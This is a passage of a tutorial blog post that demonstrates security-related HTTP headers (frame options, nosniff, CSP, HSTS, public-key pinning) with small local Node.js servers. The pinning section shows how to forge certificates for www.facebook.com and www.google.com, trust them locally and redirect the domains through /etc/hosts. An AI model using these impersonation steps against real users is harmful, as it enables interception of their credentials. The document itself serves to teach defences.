No one can embed our website at localhost:1234 in an iframe.

- http://localhost:1234/iframe?h=deny
- http://localhost:4321/iframe?h=deny

### X-Frame-Options: sameorigin

Only pages from the same origin can embed our website at localhost:1234 in an iframe. An origin is defined as a combination of URI scheme, hostname, and port number.

- http://localhost:1234/iframe?h=sameorigin
- http://localhost:4321/iframe?h=sameorigin

### X-Frame-Options: allow-from http://localhost:4321

It looks like Google Chrome ignores this directive, because you can use Content Security Policy instead (see below):

```
Invalid 'X-Frame-Options' header encountered when loading 'http://localhost:1234/?h=allow-from%20http://localhost:4321':
'allow-from http://localhost:4321' is not a recognized directive. The header will be ignored.
```

It also had no effect in Microsoft Edge. Here's Mozilla Firefox:
- http://localhost:1234/iframe?h=allow-from http://localhost:4321
- http://localhost:4321/iframe?h=allow-from http://localhost:4321

## X-Content-Type-Options

This header prevents MIME confusion attacks (`<script src="script.txt">`) and unauthorized hotlinking (`<script src="https://raw.githubusercontent.com/user/repo/branch/file.js">`).

```javascript
var express = require('express')
var app = express()

app.use('/script.txt', (req, res) => {
  if (req.query.h) res.header('X-Content-Type-Options', req.query.h)
  res.header('content-type', 'text/plain')
  res.send('alert("hacked")')
})

app.use((req, res) => {
  res.send(`<h1>Website</h1><script src="/script.txt?h=${req.query.h || ''}"></script>`)
})

app.listen(1234)
```

### No header

http://localhost:1234/

Even though script.txt is a text file served with the content type text/plain, it was still executed as if it were JavaScript.

### X-Content-Type-Options: nosniff

http://localhost:1234/?h=nosniff

This time the declared content type does not match the expected one, so the file is not executed.

## Content-Security-Policy

The newer Content-Security-Policy (CSP) response header helps you reduce XSS risks on modern browsers by declaring which dynamic resources are allowed to load. For example, you can ask the browser to ignore inline JavaScript and load JavaScript files only from your own domain. Inline JavaScript means not only `<script>...</script>` blocks but also inline event handlers such as `<h1 onclick="...">`.

Let's see how it works.
```javascript
var express = require('express')

for (let port of [1234, 4321]) {
  var app = express()
  app.use('/script.js', (req, res) => {
    res.send(`document.querySelector('#${req.query.id}').innerHTML = 'changed by ${req.query.id} script'`)
  })
  app.use((req, res) => {
    var csp = req.query.csp
    if (csp) res.header('Content-Security-Policy', csp)
    res.send(`
      <html>
      <body>
        <h1>Hello, ${req.query.user || 'anonymous'}</h1>
        <p id="inline">is this going to be changed by inline script?</p>
        <p id="origin">is this going to be changed by origin script?</p>
        <p id="remote">is this going to be changed by remote script?</p>
        <script>document.querySelector('#inline').innerHTML = 'changed by inline script'</script>
        <script src="/script.js?id=origin"></script>
        <script src="//localhost:1234/script.js?id=remote"></script>
      </body>
      </html>
    `)
  })
  app.listen(port)
}
```

### No header

http://localhost:4321

It works like you would normally expect it to.

### Content-Security-Policy: default-src 'none'

http://localhost:4321/?csp=default-src 'none'&user=

default-src applies to all resources (images, scripts, frames, etc.), and a value of 'none' does not allow anything. We can see it in action here, along with very helpful error messages: Chrome refused to load or execute any of the scripts. It also tried to load favicon.ico, even though that is prohibited too.

### Content-Security-Policy: default-src 'self'

http://localhost:4321/?csp=default-src 'self'&user=

Now we can load scripts from our own origin, but still no remote or inline scripts.

### Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'

http://localhost:4321/?csp=default-src 'self'; script-src 'self' 'unsafe-inline'&user=

This time we also allow inline scripts to run. Note that our XSS attack was also prevented. But it is not prevented if you allow unsafe-inline and set X-XSS-Protection: 0 at the same time.

### Other

content-security-policy.com has nicely formatted examples:
- `default-src 'self'` allows everything, but only from the same origin
- `script-src 'self' www.google-analytics.com ajax.googleapis.com` allows Google Analytics, the Google AJAX CDN, and the same origin
- `default-src 'none'; script-src 'self'; connect-src 'self'; img-src 'self'; style-src 'self';` allows images, scripts, AJAX, and CSS from the same origin, and does not allow any other resources to load (e.g. object, frame, media). It is a good starting point for many sites.

I have not tested this, but I think that:

- `frame-ancestors 'none'` should be equivalent to `X-Frame-Options: deny`
- `frame-ancestors 'self'` should be equivalent to `X-Frame-Options: sameorigin`
- `frame-ancestors localhost:4321` should be equivalent to `X-Frame-Options: allow-from http://localhost:4321`
- `script-src 'self'` (i.e. without 'unsafe-inline') should be equivalent to `X-XSS-Protection: 1`

If you take a look at the facebook.com and twitter.com headers, they use CSP a lot.

## Strict-Transport-Security

HTTP Strict Transport Security (HSTS) is a web security policy mechanism that helps protect websites against protocol downgrade attacks.

Say you want to go to facebook.com. Unless you type https://, the default protocol is HTTP and the default port for HTTP is 80, so the request is made to http://facebook.com.

```
$ curl -I facebook.com
HTTP/1.1 301 Moved Permanently
Location: https://facebook.com/
```

You are then redirected to the secure version of Facebook. If you were connected to public WiFi run by an attacker, they could hijack this plain-HTTP request and serve their own webpage that looks identical to facebook.com in order to collect your password. To prevent this, the site can use this header to tell the browser that the next time the user wants to go to facebook.com, they should be taken to the HTTPS version directly.
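The redirect-plus-header pattern can be sketched as Express-style middleware. The helper below is my own illustration, not code from the article; the function names are made up, and the default max-age simply mirrors the Facebook value shown next.

```javascript
// Hypothetical sketch: build a Strict-Transport-Security value and
// send plain-HTTP requests to HTTPS before setting it.
function hstsValue(opts) {
  opts = opts || {}
  var value = 'max-age=' + (opts.maxAge || 15552000) // seconds to remember "HTTPS only"
  if (opts.includeSubDomains) value += '; includeSubDomains'
  if (opts.preload) value += '; preload'
  return value
}

function forceHttps(req, res, next) {
  // Redirect HTTP to HTTPS; only responses served over TLS get the header.
  if (!req.secure) return res.redirect(301, 'https://' + req.headers.host + req.url)
  res.setHeader('Strict-Transport-Security', hstsValue({ includeSubDomains: true }))
  next()
}
```

With Express you would mount it early, e.g. `app.use(forceHttps)`.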
```
$ curl -I https://www.facebook.com/
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=15552000; preload
```

If you logged into Facebook at home and then opened facebook.com on insecure WiFi, you would be safe because the browser remembers this header. But what if you used Facebook on the insecure network for the first time ever? Then you are not protected.

To fix this, browsers ship with a hard-coded list of domains, known as the HSTS preload list, that includes the most popular HTTPS-only domain names. If you want to, you can submit your own domain there; the site is also handy for testing whether your site uses this header correctly. Yeah, I know, mine doesn't.

Values (a combination, separated by `;`):

- `max-age=15552000`: The time, in seconds, that the browser should remember that this site is only to be accessed using HTTPS.
- `includeSubDomains`: If this optional parameter is specified, the rule applies to all of the site's subdomains as well.
- `preload`: For site owners who would like their domain included in the HSTS preload list maintained by Chrome (and used by Firefox and Safari).

What if you need to switch back to HTTP before max-age expires, or you had preload set? You are out of luck. This header is very strictly enforced; you would have to ask all of your users to clear their browsing history and settings.

## Public-Key-Pins

HTTP Public Key Pinning (HPKP) is a security mechanism that allows HTTPS websites to resist impersonation by attackers using mis-issued or otherwise fraudulent certificates.

Values:

- `pin-sha256="<sha256>"`: The quoted string is the Base64-encoded Subject Public Key Information (SPKI) fingerprint. It is possible to specify multiple pins for different public keys. Some browsers might allow hashing algorithms other than SHA-256 in the future.
- `max-age=<seconds>`: The time, in seconds, that the browser should remember that this site is only to be accessed using one of the pinned keys.
- `includeSubDomains`: If this optional parameter is specified, the rule applies to all of the site's subdomains as well.
- `report-uri="<URL>"`: If this optional parameter is specified, pin validation failures are reported to the given URL.

Instead of a Public-Key-Pins header you can also use a Public-Key-Pins-Report-Only header, which only sends reports to the report-uri and still allows browsers to connect to the server even if the pinning is violated. That is what Facebook does:

```
$ curl -I https://www.facebook.com/
HTTP/1.1 200 OK
...
Public-Key-Pins-Report-Only: max-age=500; pin-sha256="WoiWRyIOVNa9ihaBciRSC7XHjliYS9VwUGOIud4PB18="; pin-sha256="r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E="; pin-sha256="q4PO2G2cbkZhZ82+JgmRUyGMoAeozA+BSXVXQWB8XWQ="; report-uri="http://reports.fb.com/hpkp/"
```

Why do we need this? Isn't trusting certificate authorities enough? An attacker could create their own certificate for www.facebook.com and trick me into adding it to my trusted root certificate store. Or it could be an administrator in your organization.

Let's create a certificate for www.facebook.com:

```shell
sudo mkdir /etc/certs
echo -e 'US\nCA\nSF\nFB\nXX\nwww.facebook.com\nno@spam.org' | \
  sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
    -keyout /etc/certs/facebook.key \
    -out /etc/certs/facebook.crt
```

And make it trusted on our computer:

```shell
# curl
sudo cp /etc/certs/*.crt /usr/local/share/ca-certificates/
sudo update-ca-certificates

# Google Chrome
sudo apt install libnss3-tools -y
certutil -A -t "C,," -n "FB" -d sql:$HOME/.pki/nssdb -i /etc/certs/facebook.crt

# Mozilla Firefox
#certutil -A -t "CP,," -n "FB" -d sql:`ls -1d $HOME/.mozilla/firefox/*.default | head -n 1` -i /etc/certs/facebook.crt
```

Let's create our own web server that uses this certificate.
```javascript
var fs = require('fs')
var https = require('https')
var express = require('express')

var options = {
  key: fs.readFileSync(`/etc/certs/${process.argv[2]}.key`),
  cert: fs.readFileSync(`/etc/certs/${process.argv[2]}.crt`)
}

var app = express()
app.use((req, res) => res.send(`<h1>hacked</h1>`))
https.createServer(options, app).listen(443)
```

Switch to our server:

```shell
echo 127.0.0.1 www.facebook.com | sudo tee -a /etc/hosts
sudo node server.js facebook
```

Does it work?

```
$ curl https://www.facebook.com
<h1>hacked</h1>
```

Good. curl validates certificates.

Because I have visited Facebook before and Google Chrome has seen the header, it should report the attack but still allow it, right? Nope. Public-key pinning is bypassed by a local root certificate. Interesting.

Alright, what about www.google.com?

```shell
echo -e 'US\nCA\nSF\nGoogle\nXX\nwww.google.com\nno@spam.org' | \
  sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
    -keyout /etc/certs/google.key \
    -out /etc/certs/google.crt
sudo cp /etc/certs/*.crt /usr/local/share/ca-certificates/
sudo update-ca-certificates
certutil -A -t "C,," -n "Google" -d sql:$HOME/.pki/nssdb -i /etc/certs/google.crt
echo 127.0.0.1 www.google.com | sudo tee -a /etc/hosts
sudo node server.js google
```

Same result. I guess this is a feature. Anyway, if you do not add these certificates to your trust store, you will not be able to visit these sites at all, because the option to add an exception (Firefox) or to proceed unsafely (Chrome) is not available.

## Content-Encoding: br

The content is compressed with Brotli. It promises better compression density than gzip with comparable decompression speed. It is supported by Google Chrome. Naturally, there is a node.js module for it.
```javascript
var shrinkRay = require('shrink-ray')
var request = require('request')
var express = require('express')

request('https://www.gutenberg.org/files/1342/1342-0.txt', (err, res, text) => {
  if (err) throw new Error(err)
  var app = express()
  app.use(shrinkRay())
  app.use((req, res) => res.header('content-type', 'text/plain').send(text))
  app.listen(1234)
})
```

- Uncompressed: 700 KB
- Brotli: 204 KB
- Gzip: 241 KB

## Timing-Allow-Origin

The Resource Timing API allows you to measure how long it takes to fetch resources on your page. Because timing information can be used to determine whether a user has previously visited a URL (based on whether the content or the DNS resolution is cached), the standard deems it a privacy risk to expose timing information to arbitrary hosts.

```html
<script>
setTimeout(function() {
  console.log(window.performance.getEntriesByType('resource'))
}, 1000)
</script>

<img src="http://placehold.it/350x150">
<img src="/local.gif">
```

It looks like you can get detailed timing information (domain lookup time, for example) only for resources on your own origin, unless the Timing-Allow-Origin header is set. Here's how you can use it:

```
Timing-Allow-Origin: *
Timing-Allow-Origin: http://foo.com http://bar.com
```

## Alt-Svc

Alternative Services allow an origin's resources to be authoritatively available at a separate network location, possibly accessed with a different protocol configuration. This one is used by Google:

```
alt-svc: quic=":443"; ma=2592000; v="36,35,34"
```

It means that the browser may, if it wants to, use QUIC (Quick UDP Internet Connections, i.e. HTTP over UDP) on port 443 for the next 30 days (the max age is 2592000 seconds, or 720 hours, or 30 days). No idea what v stands for. Version?

- https://www.mnot.net/blog/2016/03/09/alt-svc
- https://ma.ttias.be/googles-quic-protocol-moving-web-tcp-udp/

## P3P

Here are a couple of P3P headers I have seen:

```
P3P: CP="This is not a P3P policy! See https://support.google.com/accounts/answer/151657?hl=en for more info."
```
```
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
```

Some browsers require third-party cookies to use the P3P protocol to state their privacy practices. The organization that established P3P, the World Wide Web Consortium, suspended its work on this standard several years ago because most modern web browsers do not fully support it. As a result, the P3P standard is now out of date and does not reflect technologies currently in use on the web, so most websites do not have P3P policies.

I did not do much research on this, but it looks like the header is needed for IE8 to accept third-party cookies. For example, IE's "high" privacy setting blocks all cookies from websites that do not have a compact privacy policy, but cookies accompanied by P3P non-policies like those above are not blocked.

Sursa: https://peteris.rocks/blog/exotic-http-headers/
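To tie the article together, the response headers it covers can be applied from one place. The function below is my own conservative summary sketch, not a recommendation from the article; the values are illustrative defaults that you would adjust per site.

```javascript
// Hypothetical summary: one object holding a conservative set of the
// security headers discussed in the article above.
function securityHeaders() {
  return {
    'X-XSS-Protection': '1; mode=block',             // block the page on detected XSS
    'X-Frame-Options': 'deny',                       // no framing at all
    'X-Content-Type-Options': 'nosniff',             // no MIME sniffing
    'Content-Security-Policy': "default-src 'self'", // same-origin resources only
    'Strict-Transport-Security': 'max-age=15552000'  // HTTPS only for 180 days
  }
}
```

With Express you could apply it as middleware: `app.use((req, res, next) => { res.set(securityHeaders()); next() })`.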